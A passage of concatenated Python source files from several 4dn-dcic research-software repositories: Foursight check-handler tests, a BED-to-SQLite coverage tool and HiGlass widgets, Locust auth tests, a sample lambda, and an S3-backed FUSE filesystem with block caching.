bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a list of "display" environments' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': []}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a dictionary value' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'not_an_env': []}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('is not an existing environment' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': []}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a dictionary value' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': {'kwargs': []}}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a dictionary value' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': {'dependencies': {}}}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('must have a list value' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': {'dependencies': ['not_a_real_check']}}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('is not a valid check name that shares the same schedule' in str(exc.value))
# this one will work -- display provided
okay_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {}, 'display': ['data']}}
okay_validated = self.check_handler.validate_check_setup(okay_setup)
assert (okay_validated['indexing_progress'].get('module') == 'system_checks')
# this one adds kwargs and id to setup
okay_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': {}}}}}
okay_validated = self.check_handler.validate_check_setup(okay_setup)
assert ({'kwargs', 'dependencies'} <= set(okay_validated['indexing_progress']['schedule']['fake_sched']['all'].keys()))
def test_get_action_strings(self):
all_action_strings = self.check_handler.get_action_strings()
for act_str in all_action_strings:
assert (len(act_str.split('/')) == 2)
# test a specific action
one_act_str = self.check_handler.get_action_strings('patch_file_size')
assert (one_act_str == 'wrangler_checks/patch_file_size')
assert (one_act_str in all_action_strings)
# test an action that doesn't exist
bad_act_str = self.check_handler.get_check_strings('not_a_real_action')
assert (bad_act_str is None)
def test_get_schedule_names(self):
schedules = self.check_handler.get_schedule_names()
assert (isinstance(schedules, list))
assert (len(schedules) > 0)
def test_get_check_title_from_setup(self):
title = self.check_handler.get_check_title_from_setup('indexing_progress')
assert (title == self.check_handler.CHECK_SETUP['indexing_progress']['title'])
def test_get_check_schedule(self):
schedule = self.check_handler.get_check_schedule('morning_checks_1')
assert (len(schedule) > 0)
for env in schedule:
assert (isinstance(schedule[env], list))
for check_info in schedule[env]:
assert len(check_info) == 3
# test with conditions
schedule_cond1 = self.check_handler.get_check_schedule('hourly_checks_1', conditions=['put_env'])
assert (0 < len(schedule_cond1) < len(schedule))
# test with conditions that don't exist (ALL must match)
schedule_cond2 = self.check_handler.get_check_schedule('hourly_checks_1',
conditions=['put_env', 'fake_condition'])
assert (len(schedule_cond2) == 0)
def test_get_checks_within_schedule(self):
checks_in_sched = self.check_handler.get_checks_within_schedule('morning_checks_1')
assert (len(checks_in_sched) > 0)
checks_in_sched = self.check_handler.get_checks_within_schedule('not_a_real_schedule')
assert (len(checks_in_sched) == 0)
@pytest.mark.parametrize('use_es', [True, False])
def test_get_check_results(self, use_es):
# dict to compare uuids
uuid_compares = {}
# will get primary results by default
if not use_es:
self.connection.connections['es'] = None
all_res_primary = self.check_handler.get_check_results(self.connection)
for check_res in all_res_primary:
assert (isinstance(check_res, dict))
assert ('name' in check_res)
assert ('status' in check_res)
assert ('uuid' in check_res)
if check_res.get('summary') == 'Check has not yet run': # ignore placeholders
continue
uuid_compares[check_res['name']] = check_res['uuid']
# compare to latest results (which should be the same or newer)
all_res_latest = self.check_handler.get_check_results(self.connection, use_latest=True)
for check_res in all_res_latest:
assert (isinstance(check_res, dict))
assert ('name' in check_res)
assert ('status' in check_res)
assert ('uuid' in check_res)
if check_res['name'] in uuid_compares:
assert (check_res['uuid'] >= uuid_compares[check_res['name']])
# get a specific check
one_res = self.check_handler.get_check_results(self.connection, checks=['indexing_progress'])
assert (len(one_res) == 1)
assert (one_res[0]['name'] == 'indexing_progress')
# bad check name, will now return a placeholder so len should be 1
test_res = self.check_handler.get_check_results(self.connection, checks=['not_a_real_check'])
assert (len(test_res) == 1)
assert test_res[0]['summary'] == 'Check has not yet run'
def test_get_grouped_check_results(self):
grouped_results = self.check_handler.get_grouped_check_results(self.connection)
for group in grouped_results:
assert ('_name' in group)
assert (isinstance(group['_statuses'], dict))
assert (len(group.keys()) > 2)
@pytest.mark.flaky
def test_run_check_or_action(self):
test_uuid = datetime.datetime.utcnow().isoformat()
check = run_result.CheckResult(self.connection, 'test_random_nums')
# with a check (primary is True)
test_info = ['test_checks/test_random_nums', {'primary': True, 'uuid': test_uuid}, [], 'xxx']
check_res = self.check_handler.run_check_or_action(self.connection, test_info[0], test_info[1])
assert (isinstance(check_res, dict))
assert ('name' in check_res)
assert ('status' in check_res)
# make sure runtime is in kwargs and pop it
assert ('runtime_seconds' in check_res.get('kwargs'))
check_res.get('kwargs').pop('runtime_seconds')
assert (check_res.get('kwargs') == {'primary': True, 'uuid': test_uuid, 'queue_action': 'Not queued'})
primary_uuid = check_res.get('uuid')
time.sleep(5)
primary_res = check.get_primary_result()
assert (primary_res.get('uuid') == primary_uuid)
latest_res = check.get_latest_result()
assert (latest_res.get('uuid') == primary_uuid)
# with a check and no primary=True flag
check_res = self.check_handler.run_check_or_action(self.connection, test_info[0], {})
latest_uuid = check_res.get('uuid')
assert ('runtime_seconds' in check_res.get('kwargs'))
check_res.get('kwargs').pop('runtime_seconds')
assert (check_res.get('kwargs') == {'primary': False, 'uuid': latest_uuid, 'queue_action': 'Not queued'})
# latest res will be more recent than primary res now
latest_res = check.get_latest_result()
assert (latest_res.get('uuid') == latest_uuid)
primary_res = check.get_primary_result()
assert (primary_uuid < latest_uuid)
# with an action
action = run_result.ActionResult(self.connection, 'add_random_test_nums')
act_kwargs = {'primary': True, 'uuid': test_uuid, 'check_name': 'test_random_nums',
'called_by': test_uuid}
test_info_2 = ['test_checks/add_random_test_nums', act_kwargs, [] ,'xxx']
action_res = self.check_handler.run_check_or_action(self.connection, test_info_2[0], test_info_2[1])
assert (isinstance(action_res, dict))
assert ('name' in action_res)
assert ('status' in action_res)
assert ('output' in action_res)
# pop runtime_seconds kwarg
assert ('runtime_seconds' in action_res['kwargs'])
action_res['kwargs'].pop('runtime_seconds')
assert (action_res.get('kwargs') == {'primary': True, 'offset': 0, 'uuid': test_uuid, 'check_name': 'test_random_nums', 'called_by': test_uuid})
act_uuid = action_res.get('uuid')
act_res = action.get_result_by_uuid(act_uuid)
assert (act_res['uuid'] == act_uuid)
latest_res = action.get_latest_result()
assert (latest_res['uuid'] == act_uuid)
# make sure the action can get its associated check result
assc_check = action.get_associated_check_result(act_kwargs)
assert (assc_check is not None)
assert (assc_check['name'] == act_kwargs['check_name'])
assert (assc_check['uuid'] == act_uuid)
def test_run_check_errors(self):
bad_check_group = [
['indexing_progress', {}, [], 'xx1'],
['wrangler_checks/item_counts_by_type', 'should_be_a_dict', [], 'xx1'],
['syscks/indexing_progress', {}, [], 'xx1'],
['wrangler_checks/iteasdts_by_type', {}, [], 'xx1'],
['test_checks/test_function_unused', {}, [], 'xx1']
]
for bad_check_info in bad_check_group:
check_res = self.check_handler.run_check_or_action(self.connection, bad_check_info[0], bad_check_info[1])
assert not (isinstance(check_res, dict))
assert ('ERROR' in check_res)
def test_run_check_exception(self):
check_res = self.check_handler.run_check_or_action(self.connection, 'test_checks/test_check_error', {})
assert (check_res['status'] == 'ERROR')
# this output is a list
assert ('by zero' in ''.join(check_res['full_output']))
assert (check_res['description'] == 'Check failed to run. See full output.')
def test_run_action_no_check_name_called_by(self):
action_res = self.check_handler.run_check_or_action(self.connection, 'test_checks/test_action_error', {})
assert (action_res['status'] == 'FAIL')
# this output is a list
assert ('Action requires check_name and called_by in its kwargs' in ''.join(action_res['output']))
assert (action_res['description'] == 'Action failed to run. See output.')
def test_run_action_exception(self):
action_res = self.check_handler.run_check_or_action(self.connection, 'test_checks/test_action_error', {'check_name': '', 'called_by': None})
assert (action_res['status'] == 'FAIL')
# this output is a list
assert ('by zero' in ''.join(action_res['output']))
assert (action_res['description'] == 'Action failed to run. See output.')
def test_create_placeholder_check(self):
""" Tests that placeholder checks are properly generated """
placeholder = check_schema.CheckSchema().create_placeholder_check('test_check')
assert placeholder['name'] == 'test_check'
assert placeholder['status'] == 'PASS'
assert placeholder['description'] == 'If queued, this check will run with default arguments'
```
#### File: foursight/tests/test_fs_connection.py
```python
from conftest import *
from botocore.exceptions import ClientError
class TestFSConnection():
environ_info = {
'fourfront': 'test1',
'es': 'test2',
'bucket': None,
'ff_env': 'test3'
}
connection = fs_connection.FSConnection('test', environ_info, test=True, host=HOST)
def test_connection_fields(self):
assert (self.connection.fs_env == 'test')
assert (self.connection.connections['s3'].status_code == 404)
assert (self.connection.ff_server == 'test1')
assert (self.connection.ff_es == 'test2')
assert (self.connection.ff_env == 'test3')
assert (self.connection.ff_s3 is None)
assert (self.connection.ff_keys is None)
def test_run_check_with_bad_connection(self):
check_handler = check_utils.CheckHandler(FOURSIGHT_PREFIX, 'chalicelib', os.path.dirname(chalicelib_path))
check_res = check_handler.run_check_or_action(self.connection, 'wrangler_checks/item_counts_by_type', {})
# run_check_or_action returns a dict with results
print("check_res=" + str(check_res))
assert (check_res.get('status') == 'ERROR')
assert (check_res.get('name') == 'item_counts_by_type')
def test_check_result_basics(self):
test_check = decorators.Decorators(FOURSIGHT_PREFIX).CheckResult(self.connection, 'test_check')
test_check.summary = 'Unittest check'
test_check.ff_link = 'not_a_real_http_link'
assert (test_check.connections['s3'].status_code == 404)
assert (test_check.get_latest_result() is None)
assert (test_check.get_primary_result() is None)
with pytest.raises(Exception) as exec_info:
test_check.get_closest_result(1)
assert ('Could not find any results' in str(exec_info.value))
formatted_res = test_check.format_result(datetime.datetime.utcnow())
assert (formatted_res.get('status') == 'IGNORE')
assert (formatted_res.get('summary') == 'Unittest check')
assert (formatted_res.get('description') == 'Unittest check')
assert (formatted_res.get('type') == 'check')
# set a bad status on purpose
test_check.status = "BAD_STATUS"
check_res = test_check.store_result()
assert (check_res.get('name') == formatted_res.get('name'))
assert (check_res.get('description') == "Malformed status; look at Foursight check definition.")
assert (check_res.get('brief_output') == formatted_res.get('brief_output') == None)
assert (check_res.get('ff_link') == 'not_a_real_http_link')
def test_bad_ff_connection_in_fs_connection(self):
try:
# Note we do not set test=True. This should raise a ClientError because it's not a real FF env.
fs_connection.FSConnection('nosuchenv', self.environ_info, host=HOST)
except ClientError as e:
# This is what we expect to happen.
assert e.response['Error']['Code'] == 404
except Exception as e:
# Should never get here.
raise AssertionError(f"Got unexpected error ({type(e)}: {e}")
else:
# Should never get here either.
raise AssertionError(f"Got no error where a ClientError was expected.")
``` |
{
"source": "4dn-dcic/higlass-multicontact",
"score": 3
} |
#### File: higlass-multicontact/hgmc/bed.py
```python
import gzip
import math
import numpy as np
import os
import sqlite3
import time
# bed_filepath needs to be sorted!
def bed_to_sql(bed_filepath, chrom_sizes_filepath, feature_name: str = None):
base, ext = os.path.splitext(bed_filepath)
open_bed = lambda f: open(f, 'r')
if ext == '.gz' or ext == '.gzip':
open_bed = lambda f: gzip.open(f, 'rt')
base, ext = os.path.splitext(base)
sqlite_filepath = base + ".sqlite"
with open_bed(bed_filepath) as f:
num_columns = len(f.readline().split('\t'))
if num_columns < 4 and feature_name is None:
raise ValueError(
'Either provide a BED4 file or provide `feature_name`'
)
# Reset cursor
f.seek(0)
conn = sqlite3.connect(sqlite_filepath)
conn.execute("DROP TABLE IF EXISTS intervals")
conn.execute(
"""
CREATE TABLE intervals
(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
chrom TEXT,
start INT,
end INT,
name TEXT
)
"""
)
conn.execute("DROP TABLE IF EXISTS features")
conn.execute("CREATE TABLE features (name TEXT PRIMARY KEY NOT NULL)")
cur = conn.cursor()
def split_line_bed3(line):
return (*line.split('\t'), feature_name)
def split_line_bed4(line):
return line.split('\t')[:4]
split_line = split_line_bed4 if num_columns >= 4 else split_line_bed3
unique_features = set()
for line in f:
chrom, start, end, name = split_line(line)
unique_features.add(name)
cur.execute(
"INSERT INTO intervals (chrom, start, end, name) "
"VALUES (?, ?, ?, ?)",
(chrom, int(start), int(end), name),
)
conn.execute("CREATE INDEX interval_bounds ON intervals (start, end)")
for name in unique_features:
cur.execute("INSERT INTO features (name) VALUES (?)", (name,),)
if chrom_sizes_filepath:
conn.execute("DROP TABLE IF EXISTS chrom_sizes")
conn.execute(
"""
CREATE TABLE chrom_sizes
(
chrom TEXT PRIMARY KEY,
size INT
)
"""
)
cur = conn.cursor()
with open(chrom_sizes_filepath, 'r') as f:
for line in f:
chrom, size = line.split('\t')
cur.execute(
"INSERT INTO chrom_sizes (chrom, size) "
"VALUES (?, ?)",
(chrom, int(size)),
)
conn.commit()
conn.close()
def sql_features(sqlite_filepath):
conn = sqlite3.connect(sqlite_filepath)
cur = conn.cursor()
return [x[0] for x in cur.execute("SELECT name FROM features").fetchall()]
def sql_coverage(
sqlite_filepath,
chrom: str,
bin_size: int,
features: list = None,
# Number of bp of the feature that needs to be in the bin for the feature
# to count
count_at_feat_cov: int = None,
# If true, `count_at_feat_cov` represents the percentage of the feature size
# that needs to be in the bin for the feature to count
rel_count_at_feat_cov: bool = False,
# Number of bp that need to be cover by the feature for the feature
# to count
count_at_bin_cov: int = None,
# If true, `count_at_bin_cov` represents the percentage of the bin size
# that needs to be cover by the feature for the feature to count
rel_count_at_bin_cov: bool = False,
# By default, if `count_at_feat_cov` and `count_at_bin_cov` are specified
# both conditions need to be fulfilled. If `feat_or_bin_cov` is true it's
# enough that one is fulfilled
feat_or_bin_cov: bool = False,
timeit: bool = False,
verbose: bool = False
):
t0 = time.time()
conn = sqlite3.connect(sqlite_filepath)
cur = conn.cursor()
res = cur.execute(
"SELECT * FROM chrom_sizes WHERE chrom = ?", (chrom,),
).fetchone()
if res is None:
return None
_, chrom_size = res
res = cur.execute(
"SELECT MIN(id), MAX(id) FROM intervals WHERE chrom = ?", (chrom,),
).fetchone()
if res is None:
return None
min_id, max_id = res
num_bins = math.ceil(chrom_size / bin_size)
chrom_padded_size = bin_size * num_bins
coverage = np.zeros(num_bins).astype(int)
constraint_id = f'id >= {min_id} AND id <= {max_id} '
constraint_feature = ''
if features is not None:
if isinstance(features, list):
c = ' OR '.join([f'name = "{f}"' for f in features])
constraint_feature = f'AND ({c}) '
else:
constraint_feature = f'AND name = "{features}" '
i = 0
if count_at_feat_cov is None and count_at_bin_cov is None:
for bin_start in np.arange(0, chrom_padded_size, bin_size):
bin_end = bin_start + bin_size
count = cur.execute(
f"""
SELECT
COUNT(*)
FROM
intervals
WHERE
{constraint_id}
{constraint_feature}
AND start < ?
AND end >= ?
""",
(int(bin_end), int(bin_start),),
).fetchone()[0]
coverage[i] = count
if verbose:
print(f'In [{bin_start},{bin_end}) found {res[0]} annotations')
i += 1
else:
for bin_start in np.arange(0, chrom_padded_size, bin_size):
bin_end = bin_start + bin_size
results = cur.execute(
f"""
SELECT
start, end, end-start
FROM
intervals
WHERE
{constraint_id}
{constraint_feature}
AND start < ?
AND end >= ?
""",
(int(bin_end), int(bin_start),),
).fetchall()
if results is not None:
count = 0
for result in results:
feat_start, feat_end, feat_size = result
feat_coverage = min(feat_end, bin_end) - max(feat_start, bin_start)
should_count = True
if count_at_feat_cov:
threshold = rel_count_at_feat_cov * count_at_feat_cov * feat_size or count_at_feat_cov
should_count = feat_coverage >= threshold
if feat_or_bin_cov:
if should_count:
count += 1
continue
else:
should_count = True
if should_count and count_at_bin_cov:
threshold = rel_count_at_bin_cov * count_at_bin_cov * bin_size or count_at_bin_cov
should_count = feat_coverage >= threshold
if should_count:
count += 1
coverage[i] = count
if verbose:
print(f'In [{bin_start},{bin_end}) found {res[0]} annotations')
i += 1
if timeit:
print(f'Took {(time.time() - t0):.3f} sec')
return coverage
```
#### File: higlass-multicontact/hgmc/widgets.py
```python
import higlass as hg
from IPython.display import display
from matplotlib.cm import get_cmap
from .tilesets import Hgmc1dData
from .utils import get_selection_widgets, link_selection_widgets, get_anchor
cmap = get_cmap("cool")
BAR_TRACK_CONFIG = {
"uid": "bars",
"track_type": "horizontal-bar",
"position": "top",
"height": 128,
"options": {
"colorRange": ["#ffffe0", "#0000bf"],
"labelColor": "black",
"backgroundColor": "white",
},
}
ANCHORS_OPTIONS = {
"fillColor": "orange",
"fillOpacity": 1,
"outline": "white",
"outlineWidth": 1,
"outlinePos": ["left", "right"],
}
NEW_ANCHORS_OPTIONS = {
"fillOpacity": 0,
"stroke": "orange",
"strokeWidth": 2,
"strokePos": ["top", "left", "right"],
"outline": "white",
"outlineWidth": 1,
"outlinePos": ["left", "right"],
}
def get_higlass_widget(mc_level):
higlass, _, _ = hg.display(mc_level.higlass_views, no_fuse=True)
link_selection_widgets(
higlass, mc_level.select_mode, mc_level.x_from, mc_level.x_to
)
return higlass
class McLevel:
def __init__(self, tileset, higlass_views, x_from, x_to, select_mode, anchor=None):
self.tileset = tileset
self.anchor = anchor
self.higlass_views = higlass_views
self.x_from = x_from
self.x_to = x_to
self.select_mode = select_mode
@property
def root(self):
return self.anchor is None
class Hgmc1d:
def __init__(self, filepath, name: str, ignored_anchor_padding: int = 10):
self.filepath = filepath
self.name = name
self.ignored_anchor_padding = ignored_anchor_padding
self.data = Hgmc1dData(
filepath, name=self.name, ignored_anchor_padding=self.ignored_anchor_padding
)
self.base_tileset = self.data.tileset()
self.axis = hg.Track("top-axis", uid="axis")
self.levels = []
higlass_views = [
hg.View(
[self.axis, hg.Track(tileset=self.base_tileset, **BAR_TRACK_CONFIG)]
)
]
select_mode, x_from, x_to = get_selection_widgets()
self.levels.append(
McLevel(
tileset=self.base_tileset,
higlass_views=higlass_views,
select_mode=select_mode,
x_from=x_from,
x_to=x_to,
)
)
@property
def level(self):
return len(self.levels) - 1
@property
def anchors(self):
anchors = []
for level in self.levels:
if level.anchor is not None:
anchors.append(level.anchor)
return anchors
def get_anchor_regions(self, additional_anchors=[]):
anchors = self.anchors + additional_anchors
anchor_regions = []
for anchor in anchors:
if anchor is not None:
anchor_regions.append(
[
anchor - self.ignored_anchor_padding,
anchor + self.ignored_anchor_padding + 1,
]
)
return anchor_regions
def show_all_levels(self, track_height: int = 36):
tracks = [self.axis]
overlays = []
curr_anchors = []
for index, level in enumerate(self.levels):
uid = "bars-{}".format(index)
tracks.append(
hg.Track(
tileset=level.tileset,
**{**BAR_TRACK_CONFIG, **{"uid": uid, "height": track_height}}
)
)
if level.anchor is not None:
new_anchor = [
level.anchor - self.ignored_anchor_padding,
level.anchor + self.ignored_anchor_padding + 1,
]
overlays.append(
{
"uid": "overlays-{}-new".format(index),
"includes": ["bars-{}".format(index - 1)],
"options": {**{"extent": [new_anchor]}, **NEW_ANCHORS_OPTIONS},
}
)
curr_anchors.append(new_anchor)
if len(curr_anchors):
overlays.append(
{
"uid": "overlays-{}-prev".format(index),
"includes": [uid],
"options": {
**{"extent": curr_anchors.copy()},
**ANCHORS_OPTIONS,
},
}
)
else:
overlays.append(
{
"uid": "overlays-{}".format(index),
"includes": ["axis"],
"options": {
**{
"extent": self.get_anchor_regions([level.anchor]),
"minWidth": 4,
},
**ANCHORS_OPTIONS,
},
}
)
higlass, _, _ = hg.display([hg.View(tracks, overlays=overlays)], no_fuse=True)
display(higlass)
def show_current_level(self):
level = self.level
mc_level = self.levels[level]
higlass = get_higlass_widget(mc_level)
display(mc_level.select_mode, higlass, mc_level.x_from, mc_level.x_to)
def show(self, level: int = None, all: bool = False):
if all:
self.show_all_levels()
return
if level is None:
self.show_current_level()
return
level = max(0, min(self.level + 1, level))
if level > self.level:
self.show_next_level()
mc_level = self.levels[level]
higlass = get_higlass_widget(mc_level)
display(mc_level.select_mode, higlass, mc_level.x_from, mc_level.x_to)
def show_next_level(self):
self.next_level()
self.show_current_level()
def next_level(self):
current_mc_level = self.levels[self.level]
anchor = get_anchor(current_mc_level.x_from, current_mc_level.x_to)
# start, end = anchor
# if start is None or end is None:
# return current_mc_level
self.data.add_anchors(anchor)
tileset = self.data.tileset()
overlays = self.get_anchor_regions([anchor])
overlays = [
{
"includes": ["axis", "bars"],
"options": {**{"extent": overlays, "minWidth": 4}, **ANCHORS_OPTIONS},
}
]
higlass_views = [
hg.View(
[self.axis, hg.Track(tileset=tileset, **BAR_TRACK_CONFIG)],
overlays=overlays,
)
]
select_mode, x_from, x_to = get_selection_widgets()
next_mc_level = McLevel(
anchor=anchor,
tileset=tileset,
higlass_views=higlass_views,
select_mode=select_mode,
x_from=x_from,
x_to=x_to,
)
self.levels.append(next_mc_level)
return next_mc_level
def reset(self):
while len(self.levels) > 1:
self.levels.pop()
self.data.remove_anchors()
``` |
{
"source": "4dn-dcic/post-deploy-perf-tests",
"score": 3
} |
#### File: lib/test/test_locust_api.py
```python
import unittest
from unittest import mock
from ..locust_api import LocustAuthHandler
class TestLocustAPI(unittest.TestCase):
def test_load_auth_from_config(self):
with mock.patch('json.load', return_value={
'username': 'blah',
'password': '<PASSWORD>'
}):
api = LocustAuthHandler(auth=__file__, use_env=False) # this is ok since we patched json.load
self.assertEqual(api.username, 'blah')
self.assertEqual(api.password, '<PASSWORD>')
@mock.patch.dict('os.environ', {
LocustAuthHandler.LOCUST_USER_FF: 'blah',
LocustAuthHandler.LOCUST_PASS_FF: '<PASSWORD>'
})
def test_load_auth_from_ff_env(self):
api = LocustAuthHandler(use_env=True)
self.assertEqual(api.username, 'blah')
self.assertEqual(api.password, '<PASSWORD>')
@mock.patch.dict('os.environ', {
LocustAuthHandler.LOCUST_USER_CGAP: 'blah',
LocustAuthHandler.LOCUST_PASS_CGAP: '<PASSWORD>'
})
def test_load_auth_from_cgap_env(self):
api = LocustAuthHandler(use_env=True, is_ff=False) # do CGAP
self.assertEqual(api.username, 'blah')
self.assertEqual(api.password, '<PASSWORD>')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "4dn-dcic/python-lambda",
"score": 2
} |
#### File: tests/test_lambdas/example_function_update.py
```python
config = {
'function_name': 'my_test_function',
'function_module': 'service',
'function_handler': 'handler',
'handler': 'service.handler',
'region': 'us-east-1',
'runtime': 'python3.6',
'role': 'helloworld',
'description': 'Test lambda'
}
def handler(event, context):
return 'Hello! I have been updated! My input event is %s' % event
``` |
{
"source": "4dn-dcic/simple-s3fs",
"score": 2
} |
#### File: simple-s3fs/simple_s3fs/httpfs.py
```python
import collections
import logging
import numpy as np
import os
import os.path as op
import requests
import sys
import traceback
import re
from errno import EIO, ENOENT
from stat import S_IFDIR, S_IFREG
from threading import Timer
from time import time
import boto3
from fuse import FUSE, FuseOSError, Operations, LoggingMixIn
import diskcache as dc
import slugid
from ftplib import FTP
from urllib.parse import urlparse
CLEANUP_INTERVAL = 60
CLEANUP_EXPIRED = 60
REPORT_INTERVAL = 60
DISK_CACHE_SIZE_ENV = "HTTPFS_DISK_CACHE_SIZE"
DISK_CACHE_DIR_ENV = "HTTPFS_DISK_CACHE_DIR"
FALSY = {0, "0", False, "false", "False", "FALSE", "off", "OFF"}
class LRUCache:
def __init__(self, capacity):
self.capacity = capacity
self.cache = collections.OrderedDict()
def __getitem__(self, key):
value = self.cache.pop(key)
self.cache[key] = value
return value
def __setitem__(self, key, value):
try:
self.cache.pop(key)
except KeyError:
if len(self.cache) >= self.capacity:
self.cache.popitem(last=False)
self.cache[key] = value
def __contains__(self, key):
return key in self.cache
def __len__(self):
return len(self.cache)
class S3Fetcher:
SSL_VERIFY = os.environ.get("SSL_VERIFY", True) not in FALSY
def __init__(self, aws_profile, bucket, logger):
self.logger = logger
self.logger.info("Creating S3Fetcher with aws_profile=%s", aws_profile)
self.session = boto3.Session(profile_name=aws_profile)
self.client = self.session.client('s3')
self.bucket = bucket
pass
def parse_key(self, url):
url_parts = urlparse(url, allow_fragments=False)
key = url_parts.path.strip('/')
return key
def get_size(self, url):
key = self.parse_key(url)
response = self.client.head_object(Bucket=self.bucket, Key=key)
size = response['ContentLength']
return size
def get_data(self, url, start, end):
key = self.parse_key(url)
obj = boto3.resource('s3').Object(self.bucket, key)
stream = self.client.get_object(Bucket=self.bucket, Key=key, Range="bytes={}-{}".format(start, end))['Body']
contents = stream.read()
block_data = np.frombuffer(contents, dtype=np.uint8)
return block_data
class HttpFs(LoggingMixIn, Operations):
"""
A read only http/https/ftp filesystem.
"""
def __init__(
self,
bucket,
disk_cache_size=2 ** 30,
disk_cache_dir="/tmp/xx",
lru_capacity=400,
block_size=2 ** 20,
aws_profile=None,
logger=None,
):
self.lru_cache = LRUCache(capacity=lru_capacity)
self.lru_attrs = LRUCache(capacity=lru_capacity)
self.logger = logger
self.last_report_time = 0
self.total_requests = 0
if not self.logger:
self.logger = logging.getLogger(__name__)
self.fetcher = S3Fetcher(aws_profile, bucket, self.logger)
self.disk_cache = dc.Cache(disk_cache_dir, disk_cache_size)
self.total_blocks = 0
self.lru_hits = 0
self.lru_misses = 0
self.lru_capacity = lru_capacity
self.disk_hits = 0
self.disk_misses = 0
self.block_size = block_size
self.bucket = bucket
def getSize(self, url):
try:
return self.fetcher.get_size(url)
except Exception as ex:
self.logger.exception(ex)
raise
def getattr(self, path, fh=None):
# print("getattr path {}".format(path))
try:
if path in self.lru_attrs:
return self.lru_attrs[path]
if path == "/" or path.endswith('.localized') or path.endswith('.hidden') or path.endswith('.DS_Store'):
self.lru_attrs[path] = dict(st_mode=(S_IFDIR | 0o555), st_nlink=2)
return self.lru_attrs[path]
# We assume that files have a . somewhere and folder names do not contains points.
last_segment = path.split('/')[-1]
if not "." in last_segment and not path.endswith('-journal') and not path.endswith('-wal'):
return dict(st_mode=(S_IFDIR | 0o555), st_nlink=2)
url = "https://{}.s3.amazonaws.com/{}".format(self.bucket, path)
# there's an exception for the -jounral files created by SQLite
if not path.endswith('-journal') and not path.endswith('-wal'):
size = self.getSize(url)
else:
size = 0
# logging.info("head: {}".format(head.headers))
# logging.info("status_code: {}".format(head.status_code))
# print("url:", url, "head.url", head.url)
if size is not None:
self.lru_attrs[path] = dict(
st_mode=(S_IFREG | 0o644),
st_nlink=1,
st_size=size,
st_ctime=time(),
st_mtime=time(),
st_atime=time(),
)
else:
self.lru_attrs[path] = dict(st_mode=(S_IFDIR | 0o555), st_nlink=2)
return self.lru_attrs[path]
except Exception as ex:
self.logger.exception(ex)
raise
def unlink(self, path):
return 0
def create(self, path, mode, fi=None):
return 0
def write(self, path, buf, size, offset, fip):
return 0
def read(self, path, size, offset, fh):
# print("Read path {}".format(path))
t1 = time()
if t1 - self.last_report_time > REPORT_INTERVAL:
self.logger.info(
"num lru_attrs: {}/{} lru hits: {} lru misses: {} disk hits: {} total_requests: {}".format(
len(self.lru_attrs), self.lru_capacity, self.lru_hits, self.lru_misses, self.disk_hits, self.disk_misses, self.total_requests
)
)
self.last_report_time = t1
try:
self.total_requests += 1
if path in self.lru_attrs:
url = "https://{}.s3.amazonaws.com/{}".format(self.bucket, path)
self.logger.debug("read url: {}".format(url))
self.logger.debug(
"offset: {} - {} request_size (KB): {:.2f} block: {}".format(
offset, offset + size - 1, size / 2 ** 10, offset // self.block_size
)
)
output = np.zeros((size,), np.uint8)
t1 = time()
# nothing fetched yet
last_fetched = -1
curr_start = offset
while last_fetched < offset + size:
block_num = curr_start // self.block_size
block_start = self.block_size * (curr_start // self.block_size)
block_data = self.get_block(url, block_num)
data_start = (
curr_start - (curr_start // self.block_size) * self.block_size
)
data_end = min(self.block_size, offset + size - block_start)
data = block_data[data_start:data_end]
d_start = curr_start - offset
output[d_start : d_start + len(data)] = data
last_fetched = curr_start + (data_end - data_start)
curr_start += data_end - data_start
bts = bytes(output)
return bts
else:
logging.info("file not found: {}".format(path))
raise FuseOSError(EIO)
except Exception as ex:
self.logger.exception(ex)
raise
def destroy(self, path):
self.disk_cache.close()
def get_block(self, url, block_num):
"""
Get a data block from a URL. Blocks are 256K bytes in size
Parameters:
-----------
url: string
The url of the file we want to retrieve a block from
block_num: int
The # of the 256K'th block of this file
"""
cache_key = "{}.{}.{}".format(url, self.block_size, block_num)
cache = self.disk_cache
self.total_blocks += 1
if cache_key in self.lru_cache:
self.lru_hits += 1
hit = self.lru_cache[cache_key]
return hit
else:
self.lru_misses += 1
if cache_key in self.disk_cache:
try:
block_data = self.disk_cache[cache_key]
self.disk_hits += 1
self.lru_cache[cache_key] = block_data
return block_data
except KeyError:
pass
self.disk_misses += 1
block_start = block_num * self.block_size
block_data = self.fetcher.get_data(
url, block_start, block_start + self.block_size - 1
)
self.lru_cache[cache_key] = block_data
self.disk_cache[cache_key] = block_data
return block_data
```
#### File: simple-s3fs/simple_s3fs/__main__.py
```python
import os
import argparse
import logging
import sys
from fuse import FUSE
from .httpfs import HttpFs
from pathlib import Path
def main():
parser = argparse.ArgumentParser(
description="""usage: simple-s3fs <mountpoint>""")
parser.add_argument('mountpoint')
parser.add_argument(
'-f', '--foreground',
action='store_true',
default=False,
help='Run in the foreground')
parser.add_argument(
'--block-size',
default=2**20,type=int
)
